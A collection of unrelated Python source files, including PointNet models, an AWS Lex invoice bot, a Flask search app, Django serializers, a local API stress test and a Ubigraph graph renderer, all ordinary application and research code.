if epoch_type == epoch_pb2.TRAIN:
return 1
elif unroll_strategy == "constant":
# Unroll by a constant number of steps according to layer_timesteps.
return 1
elif unroll_strategy == "data_flow_max_steps":
# TODO: Gather data_flow_steps during batch construction.
max_data_flow_steps = max(
graph.data_flow_steps for graph in batch.model_data.graphs
)
logging.debug("Determined max data flow steps to be %d", max_data_flow_steps)
return max_data_flow_steps
elif unroll_strategy == "edge_count":
max_edge_count = max(graph.edge_count for graph in batch.model_data.graphs)
logging.debug("Determined max edge count to be %d", max_edge_count)
return max_edge_count
elif unroll_strategy == "label_convergence":
return 0
else:
raise ValueError(f"Unknown unroll strategy '{unroll_strategy}'")
|
'''
Author : ZHP
Date : 2021-12-07 16:29:47
LastEditors : ZHP
LastEditTime : 2022-01-14 20:11:55
FilePath : /models/pointnet/PointNetModel.py
Description :
Copyright 2021 ZHP, All Rights Reserved.
2021-12-07 16:29:47
'''
import torch
import torch.nn as nn
import torch.nn.functional as F
from .pointNetUtils import PointNetEncoder, TNetkd, feature_transform_reguliarzer
from torchsummary import summary
class PointNetCls(nn.Module):
def __init__(self, classes=40, normal_channel=True):
super().__init__()
in_channel = 6 if normal_channel else 3 # 只有坐标为3,有norm后的作为特征则为6
self.encoder = PointNetEncoder(global_feature=True, feature_transform=True, in_channel=in_channel)
self.fc1 = nn.Sequential(
nn.Linear(1024, 512),
nn.BatchNorm1d(512),
nn.ReLU()
)
self.fc2 = nn.Sequential(
nn.Linear(512, 256),
nn.Dropout(p=0.4),
nn.BatchNorm1d(256),
nn.ReLU()
)
self.fc3 = nn.Linear(256, classes)
def forward(self, x):
x, trans_matrix, trans_matrix_2 = self.encoder(x) # x [B, 1024]
x = self.fc2(self.fc1(x)) # [B, 256]
x = self.fc3(x) # [B, classes]
# 这里用了logSoftmax后,loss就应该用NllLoss
x = F.log_softmax(x, dim=-1) # [B, classed]
return x, trans_matrix_2
class PointNetPartSeg(nn.Module):
def __init__(self, part_count=50, normal_channel=True):
super().__init__()
in_channel = 6 if normal_channel else 3 # 只有坐标为3,有norm后的作为特征则为6
self.part_count = part_count
self.tnet1 = TNetkd(in_channel, 3)
self.conv1 = TNetkd.get_single_conv(in_channel, 64, 1)
self.conv2 = TNetkd.get_single_conv(64, 128, 1)
self.conv3 = TNetkd.get_single_conv(128, 128, 1)
self.conv4 = TNetkd.get_single_conv(128, 512, 1)
self.conv5 = TNetkd.get_single_conv(512, 2048, 1, activate=False)
self.tnet2 = TNetkd(in_channel=128, output_k=128)
self.classifier = nn.Sequential(
TNetkd.get_single_conv(3024, 256, 1),
TNetkd.get_single_conv(256, 256, 1),
TNetkd.get_single_conv(256, 128, 1),
nn.Conv1d(128, part_count, 1)
)
self.max_pool = torch.max
def forward(self, x, label):
'''
Author: ZHP
description: PointNet part分割网络,详细结构在原文补充材料里,concat了多个局部feature
param {torch.tensor} x : 输入点云 [B, C, N]
param {torch.tensor} label :one-hot编码,[B, 16], shapenet part有16个object,50个part,这里是点云的category label(object label)
return {torch.tensor} output: 输出点云的part类别概率(经过LogSoftmax后), [B, N, 50]
return {torch.tensor} trans_matrix_2 : 第二个T-Net学习到的transform matrix
'''
B, C, N = x.shape
trans_matrix = self.tnet1(x) # [B, C, C]
x = x.transpose(2, 1) # [B, N, C]
if C > 3:
feature = x[:, :, 3:] # feature [B, N, C-3]
x = x[:, :, :3] # coordinates [B, N, 3]
x = torch.matmul(x, trans_matrix) # 与学习到的矩阵相乘从而对齐, [B, N, 3]
if C > 3:
x = torch.cat([x, feature], dim=2) # 再拼接feature, [B, N, C]
x = x.transpose(2, 1) # [B, C, N]
local_feature_1 = self.conv1(x) # [B, 64, N]
local_feature_2 = self.conv2(local_feature_1) # [B, 128, N]
local_feature_3 = self.conv3(local_feature_2) # [B, 128, N]
trans_matrix_2 = self.tnet2(local_feature_3) # [B, 128, 128]
x = local_feature_3.transpose(2, 1)
x = torch.matmul(x, trans_matrix_2) # [B, N, 128]
local_feature_4 = x.transpose(2, 1) # [B, 128, N]
local_feature_5 = self.conv4(local_feature_4) # [B, 512, N]
x = self.conv5(local_feature_5) # [B, 2048, N]
x = self.max_pool(x, dim=2)[0] # [B, 2048]
global_feature = x.unsqueeze(2).repeat(1, 1, N) # [B, 2048, N]
one_hot_label = label.unsqueeze(2).repeat(1, 1, N)
concat = torch.cat([local_feature_1, local_feature_2, local_feature_3,\
local_feature_4, local_feature_5, global_feature, one_hot_label], dim=1) # [B, 3024, N]
output = self.classifier(concat) # [B, 50, N]
output = output.transpose(2, 1).contiguous() # [B, N, 50]
output = F.log_softmax(output, dim=-1) # [B, N, 50]
return output, trans_matrix_2
class PointNetSemanticSeg(nn.Module):
def __init__(self, class_num, in_channel=9):
super().__init__()
self.class_num = class_num
self.encoder = PointNetEncoder(global_feature=False, feature_transform=True, in_channel=in_channel)
self.segment_net = nn.Sequential(
TNetkd.get_single_conv(1088, 512, 1),
TNetkd.get_single_conv(512, 256, 1),
TNetkd.get_single_conv(256, 128, 1),
nn.Conv1d(128, class_num, 1)
)
def forward(self, point_cloud):
B, _, N = point_cloud.shape
x, trans_matrix_1, trans_matrix_2 = self.encoder(point_cloud)
x = self.segment_net(x) # [B, class_num, N]
x = x.transpose(2, 1).contiguous() # [B, N, class_num]
output = F.log_softmax(x, dim=-1) # [B, N, class_num]
return output, trans_matrix_2
class get_loss(nn.Module):
"""
PointNet Loss ,mat_diff_loss_scale是对特征转移矩阵的Loss施加的权重
"""
def __init__(self, mat_diff_loss_scale=0.001):
super(get_loss, self).__init__()
self.mat_diff_loss_scale = mat_diff_loss_scale
def forward(self, pred, target, trans_feat, weight=None):
if weight is None:
loss = F.nll_loss(pred, target)
else:
loss = F.nll_loss(pred, target, weight=weight) # semantic segmentation时需要weight
mat_diff_loss = feature_transform_reguliarzer(trans_feat) # 转移矩阵的reguliarzer loss L_reg
total_loss = loss + mat_diff_loss * self.mat_diff_loss_scale
return total_loss
if __name__ == "__main__":
# model = PointNetPartSeg()
# x = torch.rand((8, 6, 1000), dtype=torch.float)
# label = torch.rand((8, 16), dtype=torch.float)
# result, feat = model(x, label)
# print(result.shape, feat.shape)
# semantic seg
model = PointNetSemanticSeg(20)
x = torch.rand((8, 9, 1000), dtype=torch.float)
# result, feat = model(x)
# print(result.shape, feat.shape)
summary(model, (9, 1000), device='cpu') |
from typing import List
from app.models.experiment import ExperimentModel
from app.models.slate_config import SlateConfigModel
class SlateLineupExperimentModel(ExperimentModel):
"""
Models a slate_lineup experiment
"""
def __init__(self, experiment_id: str, description: str, rankers: List[str],slates: List[str],
weight: float = ExperimentModel.DEFAULT_WEIGHT):
ExperimentModel.__init__(self, experiment_id, description, rankers, weight)
# validate slates
if len(slates) < 1:
raise ValueError('no slates provided for experiment')
self.slates = slates
@staticmethod
def load_from_dict(experiment_dict: dict) -> 'SlateLineupExperimentModel':
"""
Creates an experiment object from a json-derived dictionary
:param experiment_dict: a dictionary derived from parsing json
:return: a SlateLineupExperimentModel object
"""
# generate an id for the experiment
experiment_id = ExperimentModel.generate_experiment_id(experiment_dict)
# determine the weight
weight = experiment_dict.get('weight', ExperimentModel.DEFAULT_WEIGHT)
return SlateLineupExperimentModel(experiment_id, experiment_dict["description"], experiment_dict["rankers"],
experiment_dict["slates"], weight)
@staticmethod
def slate_id_exists(slate_id: str) -> bool:
"""
Verify that the slate id exists
:param slate_id: string id of a slate to be verified
:return: boolean (pronounced like "jolene")
"""
return slate_id in SlateConfigModel.SLATE_CONFIGS_BY_ID
|
##########################################################################
# Copyright 2017-2017 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Amazon Software License (the "License"). You may not use this file
# except in compliance with the License. A copy of the License is located at
#
# http://aws.amazon.com/asl/
#
# or in the "license" file accompanying this file. This file is distributed on an "AS IS"
# BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, express or implied. See the
# License for the specific language governing permissions and limitations under the License.
##########################################################################
import json
import datetime
import time
import os
import dateutil.parser
import logging
import boto3
import tarfile
import csv
import re
from io import StringIO
from io import BytesIO
logger = logging.getLogger()
logger.setLevel(logging.INFO)
s3client = boto3.client('s3')
s3 = boto3.resource('s3')
comprehend = boto3.client('comprehend')
bucket=os.environ['S3_BUCKET']
input_bucket = s3.Bucket(bucket)
# --- Helpers that build all of the responses ---
def elicit_slot(session_attributes, intent_name, slots, slot_to_elicit, message):
return {
'sessionAttributes': session_attributes,
'dialogAction': {
'type': 'ElicitSlot',
'intentName': intent_name,
'slots': slots,
'slotToElicit': slot_to_elicit,
'message': message
}
}
def confirm_intent(session_attributes, intent_name, slots, message):
return {
'sessionAttributes': session_attributes,
'dialogAction': {
'type': 'ConfirmIntent',
'intentName': intent_name,
'slots': slots,
'message': message
}
}
def close(session_attributes, fulfillment_state, message):
response = {
'sessionAttributes': session_attributes,
'dialogAction': {
'type':'Close',
'fulfillmentState':fulfillment_state,
'message':message
}
}
return response
def delegate(session_attributes, slots):
return {
'sessionAttributes': session_attributes,
'dialogAction': {
'type': 'Delegate',
'slots': slots
}
}
# --- Helper Functions ---
def safe_int(n):
"""
Safely convert n value to int.
"""
if n is not None:
return int(n)
return n
def try_ex(func):
"""
Call passed in function in try block. If KeyError is encountered return None.
This function is intended to be used to safely access dictionary.
Note that this function would have negative impact on performance.
"""
try:
return func()
except KeyError:
return None
def build_validation_result(isvalid, violated_slot, message_content):
return {
'isValid': isvalid,
'violatedSlot': violated_slot,
'message': {'contentType': 'PlainText', 'content': message_content}
}
""" --- Functions that control the bot's behavior --- """
def get_summary(intent_request):
# Declare variables and get handle to the S3 bucket containing the Textract output
session_attributes = intent_request['sessionAttributes'] if intent_request['sessionAttributes'] is not None else {}
i = 0
qty = 0
for file in input_bucket.objects.all():
i += 1
selected_phrases = ""
input_bucket_text_file = s3.Object(bucket, file.key)
text_file_contents = str(input_bucket_text_file.get()['Body'].read().decode('utf-8'))
#Comprehend Entity Detection
detected_entities = comprehend.detect_entities(
Text=text_file_contents,
LanguageCode="en"
)
print(detected_entities)
selected_entity_types = ["ORGANIZATION", "OTHER", "DATE", "QUANTITY", "LOCATION"]
# Let's get the billing summary across invoices
for x in detected_entities['Entities']:
if x['Type'] == "OTHER" and x['EndOffset'] < 40:
nr = x['Text']
if x['Type'] == "QUANTITY" and x['EndOffset'] > 337 and x['EndOffset'] <= 350:
qty = round((qty + float(x['Text'])), 2)
return close(
session_attributes,
'Fulfilled',
{
'contentType': 'PlainText',
'content': 'I reviewed your input documents and found {} invoices with invoice numbers {} totaling ${}. I can get you invoice details or invoice notes. Simply type your request'.format(i, nr, str(qty))
}
)
def get_details(intent_request):
bill = ""
billsum = []
result = ""
y = True
session_attributes = intent_request['sessionAttributes'] if intent_request['sessionAttributes'] is not None else {}
inr = intent_request['currentIntent']['slots']['invoicenr']
r = 0
i = 0
for file in input_bucket.objects.all():
i += 1
selected_phrases = ""
input_bucket_text_file = s3.Object(bucket, file.key)
text_file_contents = str(input_bucket_text_file.get()['Body'].read().decode('utf-8'))
#Comprehend Entity Detection
detected_entities = comprehend.detect_entities(
Text=text_file_contents,
LanguageCode="en"
)
print(detected_entities)
selected_entity_types = ["DATE", "QUANTITY"]
for x in detected_entities['Entities']:
if x['Type'] in "OTHER":
detnr = x['Text']
if detnr == inr:
htmlstring = "Invoice Details for " + detnr + ": "
for x in detected_entities['Entities']:
if x['Type'] in selected_entity_types and x['EndOffset'] > 40 and x['EndOffset'] <= 337:
r += 1
if r == 1:
htmlstring += "On " + x['Text'] + " "
elif r == 2:
htmlstring += "for the item " + x['Text'] + " "
else:
htmlstring += " there is a charge of " + str(x['Text'].split()[0]) + ". "
r = 0
print("HTMLString is: " + htmlstring)
result = htmlstring + " You can request me for invoice notes or simply close this chat."
else:
result = 'Sorry I could not find a match for that Invoice Number. Please request for invoice details with a valid Invoice Number.'
return close(
session_attributes,
'Fulfilled',
{
'contentType': 'PlainText',
'content': result
}
)
def get_notes(intent_request):
session_attributes = intent_request['sessionAttributes'] if intent_request['sessionAttributes'] is not None else {}
inr = intent_request['currentIntent']['slots']['invoicenr']
i = 0
notes = ""
phrases = []
for file in input_bucket.objects.all():
i += 1
selected_phrases = ""
input_bucket_text_file = s3.Object(bucket, file.key)
text_file_contents = str(input_bucket_text_file.get()['Body'].read().decode('utf-8'))
detected_entities = comprehend.detect_entities(
Text=text_file_contents,
LanguageCode="en"
)
#print(detected_entities)
#selected_entity_types = ["ORGANIZATION", "OTHER", "DATE", "QUANTITY", "LOCATION"]
for x in detected_entities['Entities']:
if x['Type'] in "OTHER":
detnr = x['Text']
if detnr == inr:
#Comprehend Key Phrases Detection
detected_key_phrases = comprehend.detect_key_phrases(
Text=text_file_contents,
LanguageCode="en"
)
print(detected_key_phrases)
for y in detected_key_phrases['KeyPhrases']:
if y['EndOffset'] > 185 and y['EndOffset'] <= 337:
selected_phrases = " " + y['Text'] + selected_phrases + " "
#phrases.append(selected_phrases)
print("Selected Phrases are: " + selected_phrases)
#notes = notes + ". Notes for Invoice " + str(i) + " are: " + str(phrases[i - 1])
result = "Invoice Notes for " + detnr + ": " + selected_phrases
else:
result = 'Sorry I could not find a match for that Invoice Number. Please request for invoice notes with a valid Invoice Number'
return close(
session_attributes,
'Fulfilled',
{
'contentType': 'PlainText',
'content': result + '. Feel free to try the options again or you can simply close this chat'
}
)
def dispatch(intent_request):
"""
Called when the user specifies an intent for this bot.
"""
print("Intent Request is: " + str(intent_request))
logger.debug('dispatch userId={}, intentName={}'.format(intent_request['userId'], intent_request['currentIntent']['name']))
intent_name = intent_request['currentIntent']['name']
# Dispatch to your bot's intent handlers
if intent_name == 'GetInvoiceSummary':
return get_summary(intent_request)
elif intent_name == 'GetInvoiceDetails':
return get_details(intent_request)
elif intent_name == 'GetInvoiceNotes':
return get_notes(intent_request)
raise Exception('Intent with name ' + intent_name + ' not supported')
# --- Main handler ---
def lambda_handler(event, context):
"""
Route the incoming request based on intent.
The JSON body of the request is provided in the event slot.
"""
logger.debug('event.bot.name={}'.format(event['bot']['name']))
return dispatch(event) |
#!/usr/bin/env python
# Standard library imports
import argparse
import collections
import logging
import os
import time
# Additional library imports
import requests
# Named logger for this module
_logger = logging.getLogger(__name__)
# Parse the command line arguments
_parser = argparse.ArgumentParser('')
_parser.add_argument('-t', '--triggers', default='triggers', help='Folder containing trigger files')
_parser.add_argument('-r', '--rate', default=4.0, help='Poll rate in polls per second')
_parser.add_argument('-d', '--debug', action='store_true', help='Enables debug logging')
_args = _parser.parse_args()
# Configure the logging module
_logformat = '%(asctime)s : %(levelname)s : %(name)s : %(message)s'
_loglevel = logging.DEBUG if _args.debug else logging.INFO
logging.basicConfig(format=_logformat, level=_loglevel)
logging.getLogger('requests.packages.urllib3').setLevel(logging.WARNING)
# We use a session variable so that HTTP keep-alive is utilized, and
# also so we'll always remember to set the content type appropriately.
_session = requests.session()
_session.headers['Content-Type'] = 'application/json'
# Stores previous last access times for each file
# so they can be compared each time files are polled.
_atimes = collections.defaultdict(time.time)
# Poll the list of files forever
while True:
# Delay the appropriate amount of time between polls
time.sleep(1.0 / _args.rate)
# Grab a list of all fully-qualified wave file names in the trigger folder
files = (os.path.join(_args.triggers, f) for f in os.listdir(_args.triggers) if os.path.splitext(f)[1] == '.wav')
# Iterate over the list of files
for filename in files:
# If the last access time is newer than what was previous recorded then take
# action on that file. A small threshold is used to prevent "double bouncing".
if os.stat(filename).st_atime - _atimes[filename] > 1.0:
# Open the file and pull out the data
with open(filename, 'rb') as f:
req = f.read()
# Immediately store off the last accessed time
_atimes[filename] = os.stat(filename).st_atime
# Separate the components of the request
method, url, data = req[52:].splitlines(False)
# Attempt to send the request and log the results
_logger.debug('Sending {0} request to {1}'.format(method, url))
try:
response = _session.request(method, url, data=data)
_logger.debug('Received response with status code {0}'.format(response.status_code))
except requests.RequestException:
_logger.warning('Unable to contact {0}'.format(url))
|
from .stgcn import STConv, TemporalConv
from .astgcn import ASTGCN, ChebConvAttention
from .mstgcn import MSTGCN
from .gman import GMAN, SpatioTemporalEmbedding, SpatioTemporalAttention
from .mtgnn import MTGNN, MixProp, GraphConstructor
from .tsagcn import GraphAAGCN, AAGCN
from .dnntsp import DNNTSP
|
"""
This example shows how to connect events in one window, for example, a mouse
press, to another figure window.
If you click on a point in the first window, the z and y limits of the
second will be adjusted so that the center of the zoom in the second
window will be the x,y coordinates of the clicked point.
Note the diameter of the circles in the scatter are defined in
points**2, so their size is independent of the zoom
"""
from matplotlib.pyplot import figure, show
import numpy
figsrc = figure()
figzoom = figure()
axsrc = figsrc.add_subplot(111, xlim=(0,1), ylim=(0,1), autoscale_on=False)
axzoom = figzoom.add_subplot(111, xlim=(0.45,0.55), ylim=(0.4,.6),
autoscale_on=False)
axsrc.set_title('Click to zoom')
axzoom.set_title('zoom window')
x,y,s,c = numpy.random.rand(4,200)
s *= 200
axsrc.scatter(x,y,s,c)
axzoom.scatter(x,y,s,c)
def onpress(event):
if event.button!=1: return
x,y = event.xdata, event.ydata
axzoom.set_xlim(x-0.1, x+0.1)
axzoom.set_ylim(y-0.1, y+0.1)
figzoom.canvas.draw()
figsrc.canvas.mpl_connect('button_press_event', onpress)
show()
|
# USAGE
# python stress_test.py
# import the necessary packages
from threading import Thread
import requests
import time
import cv2
import base64
# initialize the Keras REST API endpoint URL along with the input
# image path
KERAS_REST_API_URL = "https://127.0.0.1/dododo/"
IMAGE_PATH = "jemma.png"
# initialize the number of requests for the stress test along with
# the sleep amount between requests
NUM_REQUESTS = 500
SLEEP_COUNT = 0.05
def call_predict_endpoint(n):
# load the input image and construct the payload for the request
#image = open(IMAGE_PATH, "rb").read()
image_np=cv2.imread(IMAGE_PATH)
image = cv2.imencode('.jpg', image_np)[1]
image_code = str(base64.b64encode(image))[2:-1]
payload = {"image": image_code}
# submit the request
r = requests.post(KERAS_REST_API_URL, data=payload,verify=False).json()
# ensure the request was sucessful
if r["success"]:
print("[INFO] thread {} OK".format(n))
# otherwise, the request failed
else:
print("[INFO] thread {} FAILED".format(n))
# loop over the number of threads
for i in range(0, NUM_REQUESTS):
# start a new thread to call the API
t = Thread(target=call_predict_endpoint, args=(i,))
t.daemon = True
t.start()
time.sleep(SLEEP_COUNT)
# insert a long sleep so we can wait until the server is finished
# processing the images
time.sleep(300) |
from ..schemas import CategoryBaseSchema, CategorySchema, CategoryUpdateSchema
from ...forum.models import Category
from app.core.exceptions import ValidationError
class CategoryManager():
def __init__(self):
self.category_create_schema = CategoryBaseSchema()
self.category_update_schema = CategoryUpdateSchema()
self.category_list_schema = CategorySchema(many=True)
self.category_schema = CategorySchema()
def __validate_category(self, category_id):
category = Category.query.filter_by(id=category_id).first()
if not category:
raise ValidationError('Category', 'Category not found')
return category
def get_all_categories(self):
categories = Category.query.order_by(Category.position.asc()).all()
return self.category_list_schema.dump(categories)
def get_category(self, category_id):
categories = Category.query.filter_by(id=category_id).first()
return self.category_schema.dump(categories)
def add_category(self, category_data):
data = self.category_create_schema.load(category_data)
return self.save(data)
def update_category(self, category_data):
self.__validate_category(category_data['id'])
data = self.category_update_schema.load(category_data)
return self.save(data)
def delete_category(self, category_id):
category = self.__validate_category(category_id)
category.delete()
def save(self, category_data):
category = Category(**category_data)
return category.save()
|
from flask import Flask, abort, make_response, request, jsonify
from flask_restful import Resource, Api
import yaml
import logging
from logging.handlers import RotatingFileHandler
from src.vec_similarity import vec_search
from src.utils.logger import init_logging
app = Flask(__name__)
api = Api(app)
init_logging()
@app.route('/')
def hello_world():
return 'Hello World'
@app.route('/ping')
def ping():
return jsonify({ "code": "200", "message": "" })
@app.route('/search', methods=['POST', 'GET'])
def search():
logging.info('search request json:{}'.format(request.json))
return vec_search()
if __name__ == '__main__':
conf = yaml.load('conf/config.yaml')
app.run() |
from rest_framework import serializers
from .models import PurchaseOrder, PurchaseOrderLine
class PurchaseOrderSerializer(serializers.HyperlinkedModelSerializer):
purchase_order_lines = serializers.HyperlinkedRelatedField(
many=True, read_only=True, view_name="purchaseorderline-detail"
)
class Meta:
model = PurchaseOrder
fields = [
"url",
"id",
"supplier",
"due_by",
"received_on",
"complete",
"value",
"received_value",
"purchase_order_lines",
]
class PurchaseOrderLineSerializer(serializers.HyperlinkedModelSerializer):
class Meta:
model = PurchaseOrderLine
read_only_fields = ["complete_date", "value"]
fields = [
"url",
"id",
"purchase_order",
"product",
"quantity",
"received_quantity",
"created_date",
"complete",
"complete_date",
"value",
"received_value",
]
|
"""
The ``zen.drawing.ubigraph`` module provides support for rendering Zen graphs in the `Ubigraph visualization environment <http://ubietylab.net/ubigraph/>`_. The renderer will update the visualization in real time as changes are made to the underlying graph. Furthermore, edges and nodes can be visually highlighted.
The functionality of this module falls into two areas: rendering the topology of the graph and highlighting nodes and edges. All this functionality is
available through the :py:class:`zen.UbigraphRenderer` class.
Rendering a graph
=================
In order to render a graph, first construct the `UbigraphRenderer` and connect it to an Ubigraph server.
A simple use case involving a connection to a local Ubigraph server would look something like::
G = DiGraph()
ur = UbigraphRenderer('http://localhost:20738/RPC2')
ur.default_node_color = '#00ff00' # all nodes will be green
ur.graph = G
G.add_edge(1,2)
G.add_edge(2,3)
In this example, the graph is empty at first. Because the renderer registers as a graph event listener, the Ubigraph view
will be updated as nodes and edges are added.
Note that it is possible to change the way that nodes and edges will be rendered by default. Currently the following attributes
are supported:
* ``default_node_color``
* ``default_node_shape``
* ``default_edge_color``
* ``default_edge_width``
All these attributes assume values dictated by the `Ubigraph API <http://ubietylab.net/ubigraph/content/Docs/index.html>`_. Both undirected and directed graphs are
supported. Directed graphs will be rendered with directed edges - everything else is the same.
Node/Edge Highlighting
======================
Nodes and edges can be highlighted using the methods :py:meth:`zen.UbigraphRenderer.highlight_nodes`/:py:meth:`zen.UbigraphRenderer.highlight_nodes_` and :py:meth:`zen.UbigraphRenderer.highlight_edges`/:py:meth:`zen.UbigraphRenderer.highlight_edges_`. As always, the underscore allows use of either node/edge indices (with the underscore) or node/edge objects (without the underscore).
The UbigraphRenderer class
==========================
.. autoclass:: zen.UbigraphRenderer()
"""
import logging
import time
import xmlrpclib
from zen.graph import Graph
from zen.digraph import DiGraph
logger = logging.getLogger(__name__)
class UbigraphRenderer(object):
"""
The UbigraphRenderer is constructed with a URL to the Ubigraph server it will connect to. Following this, the graph can be set using the ``.graph`` attribute.
"""
def __init__(self,url,**kwargs):
"""
Create an UbigraphRenderer instance that will render graph events to the server indicated in ``url``.
**Keyword Args**:
* ``graph [=None]`` (:py:class:`Graph` or :py:class:`DiGraph`): the graph that will be rendered. This can also be set using
the ``UbigraphRenderer.graph`` property.
* ``event_delay [=0]`` (float): the number of seconds that each event update call should wait. This is one way of
making the graph render more slowly. Of course, this also slows down the graph construction code itself. Use with care.
"""
graph = kwargs.pop('graph',None)
self._event_delay = kwargs.pop('event_delay',0)
if len(kwargs) > 0:
raise ZenException, 'Unexpected remaining arguments: %s' % kwargs.keys()
logger.debug('connecting to ubigraph server: %s' % url)
self.server = xmlrpclib.Server(url)
self.server_graph = self.server.ubigraph
self.highlighted_node_style = self.server_graph.new_vertex_style(0)
self.highlighted_edge_style = self.server_graph.new_edge_style(0)
self.default_node_color = '#0000bb'
self.default_node_shape = 'sphere'
self.default_edge_color = '#ffffff'
self.default_edge_width = '1.0'
self.highlighted_node_color = '#bb0000'
self.highlighted_node_shape = 'sphere'
self.highlighted_edge_color = '#ffff00'
self.highlighted_edge_width = '6.0'
# now that everything is setup, if a graph was provided, apply it!
self.graph = graph
def __graph(self,graph=None):
if graph is None:
return self._graph
else:
self.server_graph.clear()
####
# reapply defaults to the server
# set the default styles
self.default_node_color = self._default_node_color
self.default_node_shape = self._default_node_shape
self.default_edge_color = self._default_edge_color
self.default_edge_width = self._default_edge_width
if type(graph) == DiGraph:
self.server_graph.set_edge_style_attribute(0, 'arrow', 'true')
# create and set the highlighted styles
self.highlighted_node_style = self.server_graph.new_vertex_style(0)
self.highlighted_edge_style = self.server_graph.new_edge_style(0)
self.highlighted_node_color = self._hlight_node_color
self.highlighted_node_shape = self._hlight_node_shape
self.highlighted_edge_color = self._hlight_edge_color
self.highlighted_edge_width = self._hlight_edge_width
# zero out highlighted anything
self._highlighted_edges = set()
self._highlighted_nodes = set()
####
# initialize graph stuff
self._graph = graph
self.node_map = {}
self.edge_map = {}
self._graph.add_listener(self)
#####
# build up the graph as it currently exists
# briefly suspend the event delay
actual_event_delay = self._event_delay
self._event_delay = 0
for nidx,nobj,data in self._graph.nodes_iter_(obj=True,data=True):
self.node_added(nidx,nobj,data)
for eidx,data,weight in self._graph.edges_iter_(data=True,weight=True):
uidx,vidx = self._graph.endpoints_(eidx)
self.edge_added(eidx,uidx,vidx,data,weight)
# put the event delay back in place
self._event_delay = actual_event_delay
graph = property( __graph, __graph)
def __inner_default_node_color(self,color=None):
"""
If a color is given, the default node color is changed. Otherwise, the default color is returned.
"""
if color is not None:
self.server_graph.set_vertex_style_attribute(0, 'color', color)
self._default_node_color = color
else:
return self._default_node_color
def __inner_default_node_shape(self,shape=None):
"""
If a shape is given, the default node shape is changed. Otherwise, the default shape is returned.
"""
logger.debug('entering inner default node shape with %s' % shape)
if shape is not None:
self.server_graph.set_vertex_style_attribute(0, 'shape', shape)
self._default_node_shape = shape
else:
return self._default_node_shape
def __inner_default_edge_color(self,color=None):
"""
If a shape is given, the default edge color is changed. Otherwise, the default color is returned.
"""
if color is not None:
self.server_graph.set_edge_style_attribute(0, 'color', color)
self._default_edge_color = color
else:
return self._default_edge_color
def __inner_default_edge_width(self,width=None):
"""
If a width (string) is given, the default edge width is changed. Otherwise, the default width is returned.
"""
if width is not None:
self.server_graph.set_edge_style_attribute(0, 'width', width)
self._default_edge_width = width
else:
return self._default_edge_width
default_node_color = property(__inner_default_node_color, __inner_default_node_color)
default_node_shape = property(__inner_default_node_shape, __inner_default_node_shape)
default_edge_color = property(__inner_default_edge_color, __inner_default_edge_color)
default_edge_width = property(__inner_default_edge_width, __inner_default_edge_width)
def __inner_hlight_node_color(self,color=None):
"""
If a color is given, the highlighted node color is changed. Otherwise, the highlighted color is returned.
"""
if color is not None:
self.server_graph.set_vertex_style_attribute(self.highlighted_node_style, 'color', color)
self._hlight_node_color = color
else:
return self._hlight_node_color
def __inner_hlight_node_shape(self,shape=None):
"""
If a shape is given, the hlight node shape is changed. Otherwise, the hlight shape is returned.
"""
logger.debug('entering inner hlight node shape with %s' % shape)
if shape is not None:
self.server_graph.set_vertex_style_attribute(self.highlighted_node_style, 'shape', shape)
self._hlight_node_shape = shape
else:
return self._hlight_node_shape
def __inner_hlight_edge_color(self,color=None):
"""
If a shape is given, the hlight edge color is changed. Otherwise, the hlight color is returned.
"""
if color is not None:
self.server_graph.set_edge_style_attribute(self.highlighted_edge_style, 'color', color)
self._hlight_edge_color = color
else:
return self._hlight_edge_color
def __inner_hlight_edge_width(self,width=None):
"""
If a width (string) is given, the hlight edge width is changed. Otherwise, the hlight width is returned.
"""
if width is not None:
self.server_graph.set_edge_style_attribute(self.highlighted_edge_style, 'width', width)
self._hlight_edge_width = width
else:
return self._hlight_edge_width
highlighted_node_color = property(__inner_hlight_node_color, __inner_hlight_node_color)
highlighted_node_shape = property(__inner_hlight_node_shape, __inner_hlight_node_shape)
highlighted_edge_color = property(__inner_hlight_edge_color, __inner_hlight_edge_color)
highlighted_edge_width = property(__inner_hlight_edge_width, __inner_hlight_edge_width)
def node_added(self,nidx,nobj,data):
# skip nodes that have already been seen
if nidx in self.node_map:
logger.warn('node %d cannot be added. A mapping already exists.' % nidx)
return
logger.debug('registering node %d with the server' % nidx)
self.node_map[nidx] = self.server_graph.new_vertex()
self.server_graph.set_vertex
time.sleep(self._event_delay)
return
def node_removed(self,nidx,nobj):
if nidx in self.node_map:
logger.debug('removing node %d from the server.' % nidx)
self.server_graph.remove_vertex(self.node_map[nidx])
del self.node_map[nidx]
time.sleep(self._event_delay)
else:
logger.warn('node %d cannot be removed. No mapping exists.' % nidx)
def edge_added(self,eidx,uidx,vidx,data,weight):
# skip nodes that have already been seen
if eidx in self.edge_map:
logger.warn('edge %d cannot be added. A mapping already exists.' % eidx)
return
logger.debug('registering edge %d with the server' % eidx)
self.edge_map[eidx] = self.server_graph.new_edge(self.node_map[uidx],self.node_map[vidx])
time.sleep(self._event_delay)
return
def edge_removed(self,eidx,uidx,vidx):
if eidx in self.edge_map:
logger.debug('removing edge %d from the server.' % eidx)
self.server_graph.remove_edge(self.edge_map[eidx])
del self.edge_map[eidx]
time.sleep(self._event_delay)
else:
logger.warn('edge %d cannot be removed. No mapping exists.' % eidx)
def highlight_edges_(self,edges):
for eidx in edges:
if eidx not in self._highlighted_edges:
self.server_graph.change_edge_style(self.edge_map[eidx], self.highlighted_edge_style)
self._highlighted_edges.add(eidx)
return
def highlight_nodes_(self,nodes):
for nidx in nodes:
if nidx not in self._highlighted_nodes:
self.server_graph.change_vertex_style(self.node_map[nidx], self.highlighted_node_style)
self._highlighted_nodes.add(nidx)
return
def highlight_edges(self,edges):
self.highlight_edges_(map(lambda x: self._graph.edge_idx(*x),edges))
def highlight_nodes(self,nodes):
self.highlight_nodes_(map(lambda x: self._graph.node_idx(x),nodes))
if __name__ == '__main__':
import zen
import time
logging.basicConfig(level=logging.DEBUG)
G = zen.DiGraph()
ur = UbigraphRenderer('http://localhost:20738/RPC2')
ur.default_node_shape = 'sphere'
ur.default_node_color = '#1100dd'
ur.graph = G
e1 = G.add_edge(1,2)
time.sleep(1)
e2 = G.add_edge(2,3)
time.sleep(1)
e3 = G.add_edge(3,4)
time.sleep(1)
e4 = G.add_edge(1,4)
ur.highlight_edges([(1,2),(2,3)])
ur.highlight_nodes([1])
|
#%%
from HelmertTool.transform import *
from HelmertTool.regression import *
from HelmertTool.load import *
import numpy as np
#%%
